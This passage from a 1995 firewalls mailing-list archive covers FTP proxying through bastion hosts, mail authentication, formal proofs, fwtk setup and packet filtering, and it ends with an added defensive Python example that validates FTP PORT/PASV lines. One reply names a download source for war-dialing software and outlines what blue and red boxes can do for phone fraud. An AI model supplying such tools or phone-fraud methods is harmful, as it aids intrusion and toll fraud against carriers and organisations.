How do I get the connection to A and the final destination on the net? Most solutions I've seen only deal with one host between inside and outside. *Must* I authenticate twice? How does the data communicate back to the client if I'm packet filtering at the router and the return port is not the same each time (if I understand the ftp mechanism right)? Telnet and http can be accomplished with plug-gw, but how do I do ftp? Would tcp-wrapper help?
-----------------------------------------------------------------
Opinions expressed are my own and not those of Robert Bosch Corp.
-----------------------------------------------------------------
Christopher L. Werner | Robert Bosch Corporation
System Engineer       | 38000 Hills Tech Dr.
(810)553-1389         | Farmington Hills, MI 48331-3417

From firewalls-owner Mon May 8 21:38:02 1995
From: cwerner@hsdemo.merit.edu (Christopher L. Werner)
Date: Mon, 8 May 1995 23:48:30 -0500
To: firewalls@GreatCircle.com
Subject: E-mail Client Authentication through firewall

About the middle of March Rob Sansom brought up accessing mail with a POP client. Brent Chapman responded with comments about APOP as a secure POP protocol but was unsure of a good APOP server to recommend.

In Michigan our service provider, Merit, manages around 35 dial-up sites throughout the state. It is to our advantage to have our staff authenticate through our firewall by dialing in to these Network Access Servers (NASs) as if they were J.Q.Public to check their mail. We are planning on using Eudora/POP mail since it encourages short dial-up times by downloading the mail.

If APOP is not so popular, what mail server/client solutions are being used to authenticate and retrieve mail through the firewall? Telnet to Pine/Elm still requires a long connection time.
Eudora (at least the free Mac version 1.43) doesn't seem to lend itself to challenge response a la s/key. I'm assuming (dangerous) that PGP could be used to encrypt the message contents once the connection is established. Normal sequence would be:

1. Dial into NAS, authenticate via RADIUS.
2. Point mail client at host and authenticate connection through firewall (challenge/response).
3. Establish PGP credential exchange and send data.

Although we have different passwords set up for RADIUS, e-mail, and telnet, we still don't want clear text passwords sent over the net if possible.

-----------------------------------------------------------------
Opinions expressed are my own and not those of Robert Bosch Corp.
-----------------------------------------------------------------
Christopher L. Werner | Robert Bosch Corporation
System Engineer       | 38000 Hills Tech Dr.
(810)553-1389         | Farmington Hills, MI 48331-3417

From firewalls-owner Tue May 9 00:10:46 1995
From: chris@marge.mikom.csir.co.za (Chris Swanepoel)
Date: Tue, 9 May 95 8:44:38 SAT
To: firewalls@GreatCircle.COM
Subject: WARDIALLER: where to get?

hi all

(1) I would like to use a wardialler to assess the sort of risk I/WE run with the type of modem policy we have. Where in the world could I find the source for that, or the binaries at least........?
(2) Is it possible to make + run a BLUE BOX or RED BOX (used by the foNe phreaks to befuddle the local PABX's into believing certain facts), and how and where are plans for these available??? I would like to modify it to send scan codes and escape codes to modems, which can apparently modify certain on-board registers via DTMF signals.

TIA
--
Chris Swanepoel
Sysadmin for MIKOMTEK division, the CSIR of SA
chris@mikom.csir.co.za
+27 12 841 4088 voice
+27 12 841 4065 fax
From firewalls-owner Tue May 9 06:09:16 1995
From: bret@real.com (Bret McDanel)
Date: Tue, 9 May 1995 08:22:22 -0400
To: firewalls@greatcircle.com
Subject: Re: WARDIALLER: where to get?

> hi all
>
> (1)
> I would like to use a wardialler to assess the sort of risk I/WE run with
> the type of modem policy we have. Where in the world could I find the
> source for that or the binaries at least........?

You can get binaries of toneloc (one of the BEST wardialers) at ftp.paranoia.com:/pub/toneloc

> (2)
> Is it possible to make + run a BLUE BOX or RED BOX (used by the foNe
> phreaks to befuddle the local PABX's into believing certain facts), and
> how and where are plans for these available ??? I would like to modify
> it to send scan codes and escape codes to modems, which can apparently
> modify certain on-board registers via DTMF signals.
>

It is possible to make 'em, and the plans are on the net, however I don't think that it will do what you want. Both those boxes are just tone generators. A bluebox emits tones which can control routing on older switching stations (those that use inband signalling). Most countries (I believe South Africa included) have switched off systems that use inband signals to prevent fraud and other abuse. Red boxes send out a specific tone, in pulses. This fools the switching station computer into believing that a coin was deposited (don't know how that could work on a PBX).
Both of these are illegal most places in the world (their only purpose is to defraud in one form or another), although with a blue box and the right methods you can fake ANI (Automatic Number Identification, like caller id), reroute calls, tap lines, and a few other things, making them a threat. Now you can see why phone companies got off inband signalling.

From firewalls-owner Tue May 9 06:39:46 1995
From: amolitor@anubis.network.com (Andrew Molitor)
Date: Tue, 9 May 95 08:24:47 CDT
To: firewalls@greatcircle.com
Subject: Re: Source Code

I should point out, in the interest of fairness, that 'convincing argument' is, in the mathematical circles I was raised in, virtually a technical term meaning 'a proof without all the boring t's crossed and i's dotted'. This means that it's not as good as a proof, to be sure, but it's something a reasonable mathematician with a bunch of time on his or her hands could turn into a proof (assuming that no subtle errors turn up in the transmogrification). Now, whether or not this is what the Orange Book means, who knows?
Andrew

From firewalls-owner Tue May 9 07:09:38 1995
From: nto2584@tserver.dsac.dla.mil (Steven Payne)
Date: Tue, 9 May 1995 09:41:01 -0400 (EDT)
To: toreh@sds.no (toreh)
Cc: firewalls@greatcircle.com
Subject: Re: If you've got nothing to do, don't do it here (was Re: Pentagon security professionals)

> > On Thu, 4 May 1995 09:28:07 -0400 (EDT) Marcus J. Ranum wrote:
> > From: Marcus J. Ranum
> > Date: Thu, 4 May 1995 09:28:07 -0400 (EDT)
> > Subject: Re: Pentagon security professionals
> > To: "Dr. Frederick B. Cohen"
> > Cc: firewalls@greatcircle.com
> >
> > Dr. Frederick B. Cohen writes:
> > > Please feel free to flame away.
> >
> > No, please don't flame away.
> >
> > The list has enough problems with poor signal to noise ratio
> > without someone *encouraging* flaming. I've noticed a tendency for
> > some discussions on the list to continue interminably, in which one
> > or both parties refuse to forgo getting in the last word. In those
> > cases I am trying (and encourage others to do likewise) to cease
> > engaging in a discussion after a reasonable number of mails back
> > and forth.
> >
> > mjr.
>
> Yes, please, I have been reading this group for 3 years, and I am seriously thinking
> of dropping out, signal/noise ratio is way too high.
> If I get busy for a week, when I
> return, I may have to dump several hundred messages to get up-to-date...
>
> -- tore
>
>

hi,

I really have no intentions of "flaming", but I would like to add a discussion. I just began working on a project to firewall our present network. I have taken an assignment of detail to work in an area I find interesting as well as a technical challenge. I have been working in the UNIX OS environment for over 10 years, and networking as well (ungermann-bass, xns, tcp/ip, etc). During all of this time, we (older bsd 4.2 admins) treated unix as extensions of the os, in the fact that tcp/ip is the mechanism of extending the os to other heterogeneous host(s) for compatibility among other OS'. Enough of my background, and on to my topic.

I posted a question on using BSDI with the tis-fwtk as a firewall, which I find works very well. A few things I am uncomfortable with I am posting here. One of the first is that using proxies for all incoming traffic is a little cumbersome, but I can not really think of any better way without a huge access-control-list, which I feel would hamper performance because of the nature of the parsing. As a NOTE: I think that if the acl is so large, maybe the dbm libraries could help, but that's not what I am after, maybe later.

What I am after is some feelings or ideas on several issues we find important before we install the firewall into our present network environment. Here we go....

1. First and foremost PERFORMANCE! I can not stress this enough: what impact will the firewall have on ALL incoming traffic? We use all the tcp/ip services at present (with the exceptions of the "r" commands, remote finger, tftp etc). If we use the firewall and turn on capabilities such as these, what impact is this going to have?

NOTE 1: We are using a 486 running BSDI with 12 Mg of ram; unfortunately the 486 has no level 2 cache right now, it is on order (256K), and I know this will tremendously improve the OS' throughput.
Also the cpu is only a DX33. Does anyone have any real hard figures to support throughputs? We have the neal-nelson (sp) benchmark suite and hope to have some figures by the end of the week on mixes of ftp/telnet/Xclients as well as other services. We can post results when we have them. Please understand the configuration of our firewall hardware; once upgraded we will re-run the benchmarks and post them here.

NOTE 2: We understand the shortcomings of the hardware, but to make this solution possible we (the GOVT) must have access to contracts with standard systems on them, so we used what contracts are available for the solutions we are looking at.

2. What impact does the firewall have on possible applications that already exist? (I understand that no-one knows our applications) but is ORACLE a problem, i.e. oracle's sqlnet? Is it possible to use a proxy with the sqlnet, or is it required to write an application gateway? If so, are there "strawmans" available? I would like to hear if anyone else has run across the same.

3. KERBEROS. We want to use kerberos as our authentication means for access to the firewall administrator. We have clients available to use on several GOVT. contracts. We would like to know: is/will kerberos operate as a proxy through the fwtk? I suspect so, however I do not yet have it working. I have re-compiled the rlogin-gw to use kerberos but have as yet not tested it. Has someone else already done this? If so, have you tested it? Could/may we have ideas, or even if possible source? We are looking at using kerberos with kerberized servers, i.e. (all "r" commands, ftp, etc).

NOTE 3: We are also looking at S-key as a possible alternative, and we would like to support them both for flexibility. Does anyone in the group have a feeling for this? Is it a good idea? If not, what would the drawbacks be? (other than supporting 2 authentication services).

4. Mail. Our biggest way of doing business is by electronic mail.
We have exterior mail sending to us now, but this will be stopped and handled by the firewall. I am comfortable enough with the mail setup on the firewall. Does anyone have any horror stories or some helpful/constructive criticism on the setup of smtp?

That's about all the questions I can think of right now. I do have others, but those require a little more thought on implementation of them (httpd for one).

I do not wish to start a flame. I have been reading this group for about 3 weeks and I do not agree with what was previously said about the signal to noise ratio. I feel there is quite a bit of knowledge in this group, as well as a lot of people with other implementations which may not be the same as someone else's. The word here is diversity. I believe I have gotten quite a lot of info from this group and even if it doesn't pertain to what I am doing right this minute it has merit for future reference. I hope this forum grows because there are a lot of topics/issues someone else may have knowledge on and I would like an opportunity to draw on that. (a lot of stuff about re-inventing the wheel here kindly deleted).

If any of you have info or ideas on what I expressed here, please feel free to let me know what may be the best approach, drawbacks, better ideas, etc.
take care and thanks

steve payne
spayne@dsac.dla.mil
614-692-9991

From firewalls-owner Tue May 9 08:13:30 1995
From: vin@shore.net (Vin McLellan)
Date: Mon, 8 May 1995 09:55:03 -0500
To: firewalls@greatcircle.com
Cc: ari@scoscorp.com
Subject: One Time Password Tokens

Ari queried the masses:

>Anybody have any contact information about Secure Computing?

Secure Computing Corporation:
2675 Long Lake Road
Roseville, MN 55113
Tel: (612) 628-2700
Fax: (612) 628-2701
debernar@sctc.com

surete,
_Vin

--
Vin McLellan +The Privacy Guild+ USA
Tel. (617) 884-5546
Mail: 53 Nichols St., Chelsea, Ma.
02150
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

From firewalls-owner Tue May 9 08:39:44 1995
From: amolitor@anubis.network.com (Andrew Molitor)
Date: Tue, 9 May 95 10:16:23 CDT
To: firewalls@greatcircle.com
Subject: Formal methods (formerly 'Source Code')

I'll take a moment here to put forth a mathematician's view on proofs.

A proof is, in fact, nothing more than a really convincing argument. You start from some axioms, which may or may not be explicitly stated (you hope you've written down the important ones) and you crank your input through some logical methods which you also have written down, and after a while out pops the result.

For example, let's take a gander at a classic:

    All men are mortal.
    Aristotle is a man.
    Therefore Aristotle is mortal.

Looks good, right? Well, let's see what we're assuming. 'All men are mortal.' and 'Aristotle is a man.' are right up front as hypotheses. We could have a whack at proving them, but that gets us into an infinite regress of proving hypotheses. Eventually, you have to stop and assume something without proof.

Less obvious is the logical system underlying. We're also assuming that if a statement 'A' is true, and if a statement 'A implies B' is true, that then 'B' must be true.
If you like, you can take this as a definition of what it means to be true, but then you have the problem of showing that 'logical trueness' is enough to ensure that Aristotle's actually going to die.

For verifying systems, you have the problem of verifying your tools, and then verifying whatever you used to verify them, and so on, ad infinitum. Then you have the problem of whether or not the techniques used to formally transform the specifications and the implementations into whatever it is that you then show is isomorphic are actually right. After all, you can just multiply both sides by zero, proclaim 'Look, equality!', and call it done, but that's not really the same thing as showing the wretched thing will work.

The point here is that mathematical proof is altogether too often used as a spiffy mechanism for snowing the unwashed masses. When you get right down to it, all you can do is show certain sorts of consistencies, and provide convincing arguments. All 'proof' means is a higher standard of convincingness, and care taken as to what your underlying assumptions are.

If someone tries to sell you a system that's been 'proven correct', all they can possibly have done is review it in great detail, and show that if some (possibly well hidden and obscure) assumptions are true, then the box will work right. Note that this is not a statement of the form 'all they probably did'; I said and I meant 'all they can possibly have done.'

I've been a mathematician and a software engineer, and from what I can see the mathematical approach is inappropriate for software engineering. Certainly care of thought, careful design with peer review, and other formalisms have a valuable role to play, but this should not be confused with mathematics. The experimental sciences have far more to teach us.
Andrew

From firewalls-owner Tue May 9 09:07:37 1995
From: Dan Schlitt
Date: Tue, 9 May 1995 10:46:46 -0400 (EDT)
To: Andrew Molitor
Cc: firewalls@greatcircle.com
Subject: Re: Source Code

So what you are telling us is that the recent "proof" of Fermat's last theorem was just a "convincing argument".

It seems to me that the usual method of proof on this mailing list and a lot of other network groups is the famous method of proof by intimidation. When challenged, just repeat the argument over again louder. I, for one, would prefer a more rational method of argumentation on this list.

If a proposal that we are currently writing is successful I expect to have a lot of questions about firewalling networks in high schools to control access, and it would be nice if this list would have a better signal to noise ratio when I need advice.
/dan
--
Dan Schlitt                        School of Engineering Computer Systems
dan@ee-mail.engr.ccny.cuny.edu     City College of New York
(212)650-6760                      New York, NY 10031

From firewalls-owner Tue May 9 09:11:20 1995
From: nto2584@tserver.dsac.dla.mil (Steven Payne)
Date: Tue, 9 May 1995 10:46:37 -0400 (EDT)
To: mae@ECUA.NET.ec
Cc: firewalls@greatcircle.com
Subject: Re: kerberized rlogin for bsd/os

>
> I am due to connect to the internet soon and am looking at firewalls and
> other security for PC's as all we have are one sun stuffed full of the most
> confidential data and a network of PC's most running NT or Workgroups. I
> have one PC to play with for security which I guess I can give over to any
> OS I want. Any comments on your solutions and why/how you chose them would
> be most welcome. Please put my name in the subject bar if you have time to
> reply as until we are connected we are on a shared account (ACK!!!!). Many
> thanks,
>
> Rufus Evison
>
> Consulta
>
> Magician and part time security consultant.
>

Mr Evison,

We chose BSDI because the fwtk was/is tested and porting the software would be much easier. The BSDI is very inexpensive, is standard BSD, uses sockets, and the pain/anguish of getting the toolkit up and running was straightforward.
I did run into some global problems with the toolkit and compiling it. But I believe this to be an incompatibility with the "make" program, and one #define (sys_errlist) already in stdio.h; other than that it was clean. We really did not have the time to spend on porting to some other platform, so time was/is of the essence to get the firewall up and operating.

AS A NOTE: (BSD compared to SysV is much simpler.) I say this after having worked exclusively with sysVr3 for almost 5 years.

The BSDI kernel was trimmed down from the GENERIC build to just what we needed to install the toolkit and get it running. (We could post the config if needed, but I would like to do that just for people who need it.) We are in the testing mode now and are looking to run benchmarks on the platform in use. We will post these as they are available.

steve payne
DLA Systems Design Center
Office of Technology Infusion
614-692-9991
home page www.dsac.dla.mil

>
> In message Thu, 4 May 1995 20:08:58 -0400 (EDT),
> nto2584@tserver.dsac.dla.mil (Steven Payne) writes:
>
> > hi,
> > I am presently installing/testing a firewall based on the tis fwtk
> > and running on a 486 under bsd/os. My problem is I do not have the
> > kerberized rlogin working properly. We modified the port from 513 to
> > 543 and recompiled rlogin-gw. It isn't quite working yet, so I thought
> > I would pose the question to the net and see if it's already been done.
> >
> > We suspect that the negotiation of rlogin (kerberized client to the
> > rlogind -k server) may be a cause of the problem. Anyone have any
> > ideas, or better yet a completed kerberized rlogin-gw ?
> >
> > Any help would be appreciated. If we have to write the kerberized
> > rlogin-gw, sources may be possible to be obtained. Is there any interest
> > or any ideas on this subject?
> >
> > thanks
> > steve payne
> > DLA Systems Design Center
> > Office of Technology Infusion
> > 614-692-9991
> > home page
> > www.dsac.dla.mil
> >
>

From firewalls-owner Tue May 9 09:47:09 1995
From: Steve Blass
Date: Tue, 9 May 1995 12:42:00 -0700 (PDT)
To: Andrew Molitor
Cc: firewalls@greatcircle.com
Subject: Re: Formal methods (formerly 'Source Code')

There's a big difference between proof and truth which stems from the assumptions taken as axiomatically true a priori. Regarding firewalls, it implies that no matter how well the if-then chain of logic proves things are safe, the truth is that software has bugs.
From firewalls-owner Tue May 9 09:51:53 1995
From: patrick@oes.amdahl.com (Patrick Horgan)
Date: Tue, 9 May 1995 09:07:18 +0800
To: firewalls@GreatCircle.com, cwerner@hsdemo.merit.edu
Subject: Re: ftp through 2 dual-homed bastions

>
>     Outside                                        Inside
>     ----     -----------Router--------          ---------
>             dual-homed              dual-homed
>              bastion                 bastion
>     A           X                       Y            B
>
>
> User on internal net ftps Inside and connects to B.
> ftp-gw forwards connection to X.
> Responses from X are handled by ftp-gw back to B.
>
> no ip-forwarding
>

You've found the Catch-22 of passive mode. Normally ftp uses a client-originated PORT command to tell the daemon what port to connect to for the data channel. When you're behind a firewall, and not allowing incoming connections, you can instead use the PASV command to ask the server to tell the client what port to connect to for the data channel. The only difference is what direction the first connection goes; once the connection is established, tcp is tcp.

Now we come to your situation. When the user inside ftps to B and it's then proxied out of Y, from your point of view it doesn't matter whether you use PASV or PORT, since they can talk freely to the ftp-gw listening at Y.
You're only concern is whether the router in the middle will filter out the connection. This is a valid concern. If you use PASV mode, both ends of the connection, from you and from him are non- priviledged ports, and the numbers just depend on what the last port used on each machine were. If you use the PORT command, it will be an incoming connection to your firewall, the source port will be the ftp data port, port 20, and the destination port will be a high numbered (unpriviledged,) port. In the first case your router has to let this through: HIS END YOUR END X-ipaddr.PASVhighport <-- Y-ipaddr.anyhighport If you use the second with the PORT command, this is the picture: HIS END YOUR END X-ipaddr.20 --> Y-ipaddr.PORThighport The first one is inherently safer, since it's an outgoing connection. The second one is commonly used, but remember, if someone compromises X, then anything could bind port 20. If you disallow logins on Y, this is still fairly safe, because someone would have to somehow get something running on Y to talk to whatever they get running on X. What happens on the other end? If I understand you correctly, you can only connect to X, because there's no forwarding through the firewall on that end. You could get them to run a proxy with the rules set up so that traffic from Y is allowed to connect to A, or you could have the other end establish a drop site on X. That's your only choices if they aren't going to allow connections through. A variation, one used on the site where the bind package lives, among others, is that you can ftp through their firewall to a certain machine, with the filter set up to allow incoming connections to port 21, the ftp control port, and outgoing connections from port 20. If they set it up like this, you cannot use passive mode for your connection, since even though their daemon will respond to your PASV command with a port number, their filter won't allow your incoming connection through. 
If you can get them to set up the filters for this then PORT's the way to go. Some of the newer clients now try PORT first, and if the connection fails, try PASV. That get's you the best of both worlds. The ftp code in the newest libwww does this. I hope this has been informative. Patrick p.s. I still have clients modified to use PASV mode available at our ftp site, ftp://charon.amdahl.com/pub/patrick _______________________________________________________________________ / These opinions are mine, and not Amdahl's (except by coincidence;). \ | (\ | | Patrick J. Horgan Amdahl Corporation \\ Have | | patrick@amdahl.com 1250 East Arques Avenue \\ _ Sword | | Phone : (408)992-2779 P.O. Box 3470 M/S 316 \\/ Will | | FAX : (408)773-0833 Sunnyvale, CA 94088-3470 _/\\ Travel | \___________________________O16-2294________________________\)__________/ From firewalls-owner Tue May 9 10:09:45 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA24580 for firewalls-outgoing; Tue, 9 May 1995 09:39:51 -0700 Received: from sgf.fv.com (sgf.fv.com [199.171.113.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA24564 for ; Tue, 9 May 1995 09:39:45 -0700 Received: by sgf.fv.com (Smail3.1.28.1 #52) id m0s8sIK-000GrwC; Tue, 9 May 95 12:38 EDT Date: Tue, 9 May 1995 12:38:00 +0100 From: FV Admin mail Subject: Re: Source Code To: Dan Schlitt cc: Andrew Molitor , firewalls@GreatCircle.COM In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 9 May 1995, Dan Schlitt wrote: > So what you are telling us it that the recent "proof" of Fermat's last > theorem was just a "convincing argument". No, because the proof of Fermat's theorem was about formal things, numbers to be exact. You can prove the area of a circle is a certain number relative to the radius, but you can't prove that the disk you just milled has a certain area. 
You can prove that a program should always generate the answer "42", but if you run it on a Pentium, you may be in trouble.

See the difference?

--Darren

From firewalls-owner Tue May 9 10:34:36 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA23925 for firewalls-outgoing; Tue, 9 May 1995 09:15:23 -0700
Received: from noc1.mid.net (noc1.mid.net [198.247.250.15]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA23920 for ; Tue, 9 May 1995 09:15:19 -0700
Received: (from alan@localhost) by noc1.mid.net (8.6.10/8.6.9) id LAA23178 for firewalls@greatcircle.com; Tue, 9 May 1995 11:15:48 -0500
From: Alan Hannan
Message-Id: <199505091615.LAA23178@noc1.mid.net>
Subject: SNMP list consolidated
To: firewalls@greatcircle.com
Date: Tue, 9 May 1995 11:15:46 -0500 (CDT)
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1390
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Howdy.

Well, 'twas it not Tesla and Edison who both "discovered" the transformation of electrical power at the same time? Perhaps not.

Regardless, Michael Richardson, Patrick Horgan, and I have agreed to consolidate the firewall SNMP MIB discussion to the list located at "fw-snmp@mid.net". Thank you both for such a quick resolution.

Michael, perhaps you'd care to subscribe the people in your list onto the mailing list at midnet by scripting a mass subscribe.

Anyone who has mailed me personally asking me to add them to the list, I don't have the time or inclination to do such. If you can't figure out how to add yourself, send a message to majordomo@mid.net with "help" in the body of the letter. (That's without the quotes.)

I'm on vacation anyway. I'm at the Apple World Wide Developer's Conference in case anyone else is. It's not that I like Macs, just that Mac users have a lot of money...
;)

Thank you everyone for subscribing, I showed 60 subscriptions last night at 8pm central, and many many more since. I look forward to fruitful discussion.

--
alan@mid.net,                                (402) 472-0241 (voice)
Networked Systems Administrator              (402) 472-0240 (fax)
MIDnet, the United States Oldest Regional Internet Service Provider
"They that can give up essential liberty to obtain a little temporary safety
 deserve neither liberty nor safety."  - Benjamin Franklin

From firewalls-owner Tue May 9 10:39:24 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA26040 for firewalls-outgoing; Tue, 9 May 1995 10:37:16 -0700
Received: from nahanni.BouletFermat.ab.ca (dboulet.ccinet.ab.ca [198.161.96.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA26027 for ; Tue, 9 May 1995 10:37:07 -0700
Received: (from danny@localhost) by nahanni.BouletFermat.ab.ca (8.6.9/8.6.9) id LAA02644 for firewalls-digest@greatcircle.com; Tue, 9 May 1995 11:01:01 -0600
Date: Tue, 9 May 1995 11:01:01 -0600
From: Danny Boulet
Message-Id: <199505091701.LAA02644@nahanni.BouletFermat.ab.ca>
To: firewalls-digest@greatcircle.com
Subject: Re: IP Packet Filtering
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Someone asked what various IP packet filtering packages do with fragmented packets (or something along those lines). My facility (ipfirewall) works as follows:

- you can filter based on whether a packet is:
    = the first fragment of a fragmented packet
    = a fragment other than the first fragment of a fragmented packet
    = any fragment of a fragmented packet

- filters that check TCP/UDP port numbers or that check if the packet is a TCP connection-attempt packet (has the SYN flag set and the ACK flag clear) are only applied to the first fragment if the packet has been fragmented. Also, the information needed to do the check (the port numbers and the TCP flags if needed) must be in this first fragment or the packet is rejected.
I will concede that, in theory, this implementation is broken (i.e. it could reject a packet that shouldn't be rejected). I contend that, in practice, the implementation is correct since packets aren't fragmented into pieces that are so small that the TCP flags appear in the second fragment. If someone sends you fragments that are so short that the TCP flags don't make it into the first fragment then either the sender is trying to do something weird or it is going to take an absurd number of fragments to get any reasonable amount of data through to you.

My ipfirewall package is available via ftp from

    ftp://ftp.nebulus.net/pub/bsdi/security/ipfirewall_v2.0a.gz
or
    ftp://ftp.bsdi.com/contrib/networking/security/ipfirewall_v2.0a.shar.gz

Please contact me directly for more information (danny@BouletFermat.ab.ca).

-Danny

From firewalls-owner Tue May 9 13:23:37 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA29331 for firewalls-outgoing; Tue, 9 May 1995 12:49:10 -0700
Received: from VNET.IBM.COM (vnet.ibm.com [199.171.26.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA29325 for ; Tue, 9 May 1995 12:49:02 -0700
Received: from BTV by VNET.IBM.COM (IBM VM SMTP V2R3) with BSMTP id 9006; Tue, 09 May 95 15:49:25 EDT
Received: by BTV (XAGENTA 4.0) id 7262; Tue, 9 May 1995 15:49:16 -0400
Received: from kdp.btv.ibm.com by btv.ibm.com (AIX 3.2/UCB 5.64/1.9) id ; Tue, 9 May 1995 15:49:17 -0400
Received: by btv.ibm.com (AIX 3.2/UCB 5.64/fs4.03) id AA36816; Tue, 9 May 1995 15:49:17 -0400
Message-Id: <9505091949.AA36816@btv.ibm.com>
To: firewalls@greatcircle.com
X-Note-Format: RFC822
Subject: Re: One Time Password Tokens
In-Reply-To: <199505091450.AA07097@northshore.ecosoft.com>
Date: Tue, 09 May 1995 15:49:17 -0400
From: "Ken Paquette"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Or does anybody have any information on

CRYPTOCard, Inc.
1649 Barclay Blvd.
Buffalo Grove, IL.
--
Ken Paquette; IBM Microelectronics Division; Distributed Computing Services
VNET: KEN at BTV; IBM internet: ken@btv.ibm.com; Internet: ken@vnet.ibm.com;
IBMMAIL: USIB1X62; X.400 c=us; a=ibmx400; p=ibmmail; s=paquette; g=paquetk

From firewalls-owner Tue May 9 13:53:00 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA29246 for firewalls-outgoing; Tue, 9 May 1995 12:42:46 -0700
Received: from math.ams.org (MATH.AMS.ORG [130.44.1.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA29241 for ; Tue, 9 May 1995 12:42:37 -0700
Received: from sol08.ams.org by MATH.AMS.ORG (PMDF #7286 ) id <01HQAYZHTE5S95NE55@MATH.AMS.ORG>; Tue, 9 May 1995 15:42:47 EST
Received: by sol08.ams.org (4.1/SMI-4.1) id AA01467; Tue, 9 May 95 15:42:40 EDT
Date: 09 May 1995 15:42:39 -0300 (BST)
From: Todd Vander Does
Subject: Liable for security
To: Firewalls@GreatCircle.COM
Message-id:
Content-transfer-encoding: 7BIT
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

We are analyzing the potential costs of a security breach. One of the questions we are considering is the liability that may be incurred with various types of unauthorized behavior. What legal problems could a company incur if:

1. An employee posts offensive material?
2. A cracker hid a trojan horse in materials the company distributes?
3. A cracker distributes copyrighted software from the company's server?

There are many different angles, but the basic question is whether or not there is a real risk of being held liable for damage done by illicit changes to the company's computer system.

Does anyone know of relevant cases? Can anyone refer me to useful reference material?
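The PORT/PASV discussion in Patrick Horgan's reply above comes down to who opens the data connection and from which port, which is what the router has to let through. The following is an added example, not code from that posting or from any ftp-gw: it parses a client's PORT command or the server's "227 Entering Passive Mode" reply, derives the connection each implies in the notation of the two pictures in the reply, and applies the checks a proxy should make before admitting it (the data address must name the control-connection peer, and the data port must be unprivileged). The hosts, ports and function names (`data_connection`, `accepted`, `X_HOST`, `Y_HOST`) are constructed for the example; X and Y follow the labels in the reply.

```python
"""PORT vs PASV data connections: an added example, not from the posting.
Parses the client's PORT command or the server's "227 Entering Passive Mode"
reply, derives the TCP connection it implies (who connects to whom, from and
to which port), and applies the checks a proxy or filter should make before
admitting it.  Hosts and ports below are constructed, not from the thread."""
import re
from dataclasses import dataclass
from typing import Optional

FTP_DATA_PORT = 20
_HOSTPORT = re.compile(r"(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})")


@dataclass
class DataConnection:
    mode: str                # "PORT" or "PASV"
    initiator: str           # host that opens the data connection
    src_port: Optional[int]  # 20 for PORT; any unprivileged port for PASV
    responder: str           # host that must accept it
    dst_port: int

    def inbound_to(self, host: str) -> bool:
        """Does the data connection arrive at `host`, so its filter must admit it?"""
        return self.responder == host

    def filter_rule(self) -> str:
        """The rule in the notation of the two pictures in the reply."""
        src = f"{self.initiator}.{self.src_port or 'anyhighport'}"
        return f"allow tcp {src} -> {self.responder}.{self.dst_port}"


def parse_hostport(text: str):
    """Return (host, port) from an h1,h2,h3,h4,p1,p2 group; port = p1*256 + p2."""
    m = _HOSTPORT.search(text)
    if not m:
        raise ValueError(f"no h1,h2,h3,h4,p1,p2 in {text!r}")
    n = [int(x) for x in m.groups()]
    if max(n) > 255:
        raise ValueError(f"octet out of range in {text!r}")
    return ".".join(map(str, n[:4])), n[4] * 256 + n[5]


def data_connection(line: str, client: str, server: str) -> DataConnection:
    """Work out the data connection implied by one FTP control-channel line.

    `client` and `server` are the control-connection peers; a data address
    naming any other host is refused, so neither side can be pointed at a
    third party, and privileged data ports are refused as well.
    """
    host, port = parse_hostport(line)
    if port <= 1023:
        raise ValueError(f"data port {port} is privileged")
    verb = line.strip().upper()
    if verb.startswith("PORT"):
        if host != client:
            raise ValueError(f"PORT names {host}, not the client {client}")
        # the server connects from port 20 to the client's chosen high port
        return DataConnection("PORT", server, FTP_DATA_PORT, client, port)
    if verb.startswith("227"):
        if host != server:
            raise ValueError(f"227 reply names {host}, not the server {server}")
        # the client connects from an unprivileged port to the server's high port
        return DataConnection("PASV", client, None, server, port)
    raise ValueError(f"not a PORT command or 227 reply: {line!r}")


def accepted(line: str, client: str, server: str) -> bool:
    """True when the line passes every check above."""
    try:
        data_connection(line, client, server)
        return True
    except ValueError:
        return False


# X (his end) and Y (your end) as labelled in the reply, with constructed addresses.
X_HOST, Y_HOST = "192.0.2.5", "198.51.100.7"


def demo():
    """Both directions for a transfer where Y is the ftp client of X."""
    pasv = data_connection("227 Entering Passive Mode (192,0,2,5,19,137)", Y_HOST, X_HOST)
    port = data_connection("PORT 198,51,100,7,156,64", Y_HOST, X_HOST)
    return pasv, port
```

`demo()` yields the two rules from the reply: in PASV mode Y opens the connection to X's high port, so nothing inbound has to be admitted at Y; in PORT mode X connects from port 20 to Y's high port and the router in front of Y must let that in. The address check in `data_connection` is the part a proxy most needs: a PORT or 227 line that names a host other than the control-connection peer should never be honoured.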
